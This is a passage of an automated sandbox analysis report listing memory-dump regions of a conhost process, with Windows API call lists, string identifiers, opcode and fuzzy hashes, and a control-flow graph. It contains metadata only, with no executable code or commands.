                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: a73bc92d5c3928421890baee4e3c705afb83db72269209e8fa0cdfdb8cbe6f5d
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: B681D639B00740CEFB54AB6A9E453ED6391AB857C4F944225EA09F77D7DB3BC8458700
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction ID: fa12b446e92f011d855497a2b84f6d0c869c32bc38e8e96e8b41bfefb1cd84e2
                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                          • Instruction Fuzzy Hash: BF81D239B30241CAFE74AB279C413D9629DABC6780F1541A99E08C7796EFBBC855C700

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 558 166be499aac-166be499aea 559 166be499b9e 558->559 560 166be499af0-166be499af3 558->560 561 166be499ba0-166be499bbc 559->561 560->561 562 166be499af9-166be499afc 560->562 563 166be499b02-166be499b11 562->563 564 166be499b96 562->564 565 166be499b1e-166be499b3d LoadLibraryExW 563->565 566 166be499b13-166be499b16 563->566 564->559 569 166be499b3f-166be499b48 GetLastError 565->569 570 166be499bbd-166be499bd2 565->570 567 166be499bdd-166be499bec GetProcAddress 566->567 568 166be499b1c 566->568 567->564 572 166be499bee-166be499bf9 567->572 573 166be499b89-166be499b90 568->573 574 166be499b77-166be499b81 569->574 575 166be499b4a-166be499b5f call 166be49c4d8 569->575 570->567 571 166be499bd4-166be499bd7 FreeLibrary 570->571 571->567 572->561 573->563 573->564 574->573 575->574 578 166be499b61-166be499b75 LoadLibraryExW 575->578 578->570 578->574
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499B31
                          • GetLastError.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499B3F
                          • LoadLibraryExW.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499B69
                          • FreeLibrary.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499BD7
                          • GetProcAddress.KERNEL32(?,?,?,00000166BE499C6B,?,?,?,00000166BE49945C,?,?,?,?,00000166BE498F65), ref: 00000166BE499BE3
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction ID: 1e9911877a6e26ca072c93f2bbd287096faf56c8d1a45b2a67bdb5b1f599fccf
                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                          • Instruction Fuzzy Hash: 3B31AF35312A40DAEE119B06AE007E923E4BB48BE4F590635EE1DDB796EF3EC444C710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction ID: b4189d2c00d3b4ac44951a0ad98a1955424120283a588704f76f63cf9c03904c
                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                          • Instruction Fuzzy Hash: 5F116A32714B40C6E7508B66EC5479DB6A0F798BF5F445224EA5EC7BA4DF7EC8048B40
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction ID: 68bac6320a100f6cf9524770fd5d823ca44a1ed145f9566f2d5cafe5ff7032b2
                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                          • Instruction Fuzzy Hash: ABD19A7A608B88C5DA709B1AED9439E77A0F3C8BC8F500256EA8D977A5DF3DC551CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Free$CurrentThread
                          • String ID:
                          • API String ID: 564911740-0
                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction ID: 2a06cfc6e5944a48507200ef20666fba28f2a905a7bb9fa51ce9760ab3085d3f
                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                          • Instruction Fuzzy Hash: EB51F539701B45D9EF05DF24EE913E833A1FB057C4F840825A52C963AAEF7AD929C354
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: $cnt-
                          • API String ID: 756756679-2536841369
                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction ID: 6e019a41d278c29ddd0080555b362a1ee6659d406dfdddf8911869c8b137c654
                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                          • Instruction Fuzzy Hash: B9318E36701B51DAEB21DF26EE407A963A1FBC5BD5F0840309F4997B56EF3AD8618700
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction ID: 2e21d531b0a6f9a0e180fa11ca586c22c66354989c6ae7d2b2a953652679ffb0
                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                          • Instruction Fuzzy Hash: 64115E39701240CAFA1867716F553FF2252AB847E0F585624AD6AF63C7CE3ED4015700
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction ID: 75985bdda7cf5660b0e08de1b699a682b4a271ef83656db5e7402c993114a372
                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                          • Instruction Fuzzy Hash: 76016935704B40C6EB10DB12AD5839AA3A1FB88FE0F884035DE9D87B54DE7EC985CB80
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction ID: 3982b69a75c74c18ee649c6c9da2a08a47cd84a0322c81104c86daa7ba99008e
                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                          • Instruction Fuzzy Hash: 8F012579715B40C6FB249B22ED4879A73B0BB99BD5F140428CA4D863A5EF3EC048CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction ID: 46b239f30bb04f292622cf27cccf0bcbdef9bed9ffee2ffb165e9e2b88e10d1d
                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                          • Instruction Fuzzy Hash: C9F06272304685D2EB209B21FEC43D9A361F784BE8FC45031DA4987A59DF7EC689CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction ID: 65d7fbcc7e9903a1c4eab5254f75e3833d621c0eb704783dc2350b09846fff45
                          • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                          • Instruction Fuzzy Hash: 18F0A074304B80C2FE449B13BE1419AA260FB88FD1F48A030EE0A97B29DF7DC4458B00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction ID: 7e6000e13e1fb65474f988f3113df510af642b86e434f7991d411ce1221ec211
                          • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                          • Instruction Fuzzy Hash: 65F09A75365A01C5EA108B24AC843E96360EB897F0F982229DA6AC65E4CF7EC848CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction ID: 13359bd2323b5128eb19eee7f104449875d5b0718491646c582b0fd3c54083a9
                          • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                          • Instruction Fuzzy Hash: A502E936619B84CAEB60CB55F99439AB7A0F3C47D4F200015EA8E97BA9DF7DC494CB10
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction ID: 3dad8f73fe7ae5aa3f8930ed4e10bd4a57ed6c91f15ced3b66cfc03a67931d46
                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                          • Instruction Fuzzy Hash: 57519C3A714611CBE764CB26BD40AAAB3A0F789BD4F504129DE4A93B56DF3AC845CB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction ID: 68e5ce0a4b6170b8b0db872730a7d9d597251b13a1165e40e6fb2ae29e92476e
                          • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                          • Instruction Fuzzy Hash: CD51BB3A714601CBE724DF26BD40BAAB3A4F789BC0F504129EE4A93B55DF3AC805CB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction ID: de9993ca86bb3584239471d980e0057151692e0e5072efe5ff4096b5e3f69e2a
                          • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                          • Instruction Fuzzy Hash: BC61B73A629A44CBEB60CF55ED9435EB7A0F3887D4F100115EA8E97BA9DB7EC540CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 1092925422-0
                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction ID: aa679931519f191bef8d5bffcd812e7300f2d489e5699fd636e3ef5278bf5635
                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction Fuzzy Hash: 8A114236709740D7EB249F21ED0429A67B0FB85BD1F040026DE5D93799EB7EC958C784
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2395640692-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: 0777ffe8dd2f2bad62ce19ba1cf8a8400516cff88cbf09883b3117d3db10d415
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: 4E51A13A311600CEEB54CF29EE54BAD7791F358BD8F158125DA4AD778ADB7AC841C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: 9e6e676582616d8b4dc0cd5ead2e5c3730fd67bb3d167a7f88c7350ea3c90f58
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: 77618E76604BC4C9DB218F15E9407DAB7A0F789BD8F044615EB9863B9ADB7DC198CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
